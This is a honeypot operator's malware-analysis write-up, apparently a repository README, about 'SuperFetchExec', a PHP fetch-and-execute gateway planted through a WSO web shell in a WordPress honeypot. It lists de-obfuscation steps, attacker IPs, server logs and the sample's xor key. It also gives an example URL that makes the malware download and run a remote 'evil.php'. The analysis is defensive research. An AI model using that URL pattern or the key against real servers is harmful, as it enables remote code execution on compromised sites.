SuperFetchExec is a file transfer gateway. Accessed by URL, something like:
http://example.com/directory/syslib.php?superfetch+http://something.com/evil.php
SuperFetchExec would try to download evil.php from
http://something.com to the compromised macine on which it runs.
Then SuperFetchExec would try to execute evil.php
UPDATE 2018-08-13: my WSO honey pot got a new instance of this code. Same IP address, same everything. Why doesn't somebody shut this crap down?
178.137.88.27 → 178-137-88-27.broadband.kyivstar.net
kyivstar.net appears to be a ISP in Kiev, Ukraine.
178.137.88.27 geolocates to downtown Lviv, Ukraine.
p0f3 says that 178.137.88.27 is "Windows 7 or 8", sort of consistent with the user agent string it used.
Someone intended to download this code via the "FilesMan" action, "uploadFile"
sub-action of a WSO web shell they thought was installed in
my WordPress honey pot. I have a fake WSO web shell, so I just caught the file.
The file was intended to be named syslib.php
~/src/php/reverse-php-malware/pp.php 178.137.88.27WimZ3KYUg72jOWoTIndRKAAAAAM.0.file > f1.php, pretty-print the original.- Hand-edit
f1.php, change "eval" to "print", so that I can execute it php f1.php > dc1.php, add "<?php" todc1.php~/src/php/reverse-php-malware/pp.php dc1.php > f2.php, pretty-print the first level de-obfuscated code.- Hand-edit
f2.phpintodc2.php, so that I can safely execute it. php dc2.php > puzzling.dat
File puzzling.dat is the same xor-encoded PHP source as used in
xor-decoding as an
example of how to decode just such a file.
See that repo for an explanation of how to get the key to
decode puzzling.dat.
The key string is "SjJVkE6rkRYj", which is the value of $k that code
in f2.php tries to get out of POST or GET parameters.
I've reverse-engineered the first-stage encoding that steps 2 and 3 above just gloss over.
Apparently this is the "SuperFetchExec" malware, an early reference has it around since 2012, using the same key. How does this same stupid thing get used for 5+ years?
To get to the SuperFetchExec code:
php decoder.php > superfetchexec.php
Looks like someone tried to execute syslib.php:
/var/log/httpd/access_log.3:176.119.3.201 - - [07/Dec/2017:13:33:31 -0700] "GET /wordpress//wp-content/plugins/revslider/temp/update_extract/revslider/syslib.php HTTP/1.1" 200 120 "-" "Mozilla/5.0 (compatible; Goooglebot/2.1; +http://www.google.com/bot.html)"
/var/log/httpd/access_log.3:176.119.3.201 - - [07/Dec/2017:13:33:43 -0700] "GET /wordpress//wp-content/plugins/revslider/temp/update_extract/revslider/syslib.php HTTP/1.1" 200 120 "-" "Mozilla/5.0 (compatible; Goooglebot/2.1; +http://www.google.com/bot.html)"
That access happened almost 50 minutes after the installation attempt. Looks like both attempts tried
to get the Linux hostname command to execute locally.
See files 176.119.3.201Wimlp1Qt96SxMyTU5Bip4QAAAAE.wso.scans and 176.119.3.201Wimlm6YUg72jOWoTIndRSQAAAAM.wso.scans
for exact details. My fake WSO left those files behind as a record.
Oddly DNS has 176.119.3.201 → mail.countrypost.top, which is
registered to a Philadelphia USA address. whois has 176.119.3.201
in VSERVER-NET, in AS58271 - VSERVER-AS, a Donetsk Ukraine ISP.
p0f3 doesn't have a guess about the OS used by 176.119.3.201, saying:
raw_sig=4:64+0:0:1460:mss*20,7:mss,sok,ts,nop,ws:df:0